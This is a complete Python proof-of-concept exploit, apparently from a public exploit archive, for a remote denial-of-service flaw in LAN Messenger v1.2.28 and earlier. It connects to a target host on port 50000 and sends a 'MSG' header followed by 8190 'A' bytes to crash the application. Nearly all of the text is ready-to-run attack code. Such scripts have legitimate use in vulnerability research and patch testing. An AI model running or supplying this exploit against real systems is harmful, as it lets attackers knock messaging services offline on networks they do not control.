#!/usr/bin/python # Exploit Title: LAN Messenger <= v1.2.28 Remote Denial of Service Vulnerability # Version: <= v1.2.28 # Date: 2012-04-28 # Author: Julien Ahrens # Homepage: www.inshell.net # Software Link: http://lanmsngr.sourceforge.net/ # Tested on: Windows XP SP3 Professional German, Windows 2008R2 SP1 German # Notes: Under WinXP the app needs 8190 Bytes to crash # Howto: -
from struct import pack import socket,sys import os
target="192.168.0.1" port=50000
junk = "\x41" * 8190
print "[*] Connecting to Target " + target + "..."
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: connect=s.connect((target, port)) print "[*] Connected to " + target + "!" except: print "[!] " + target + " didn't respond\n" sys.exit(0)
print "[*] Sending malformed request..." s.send("\x4d\x53\x47" + junk)
print "[!] Exploit has been sent!\n" s.close()
|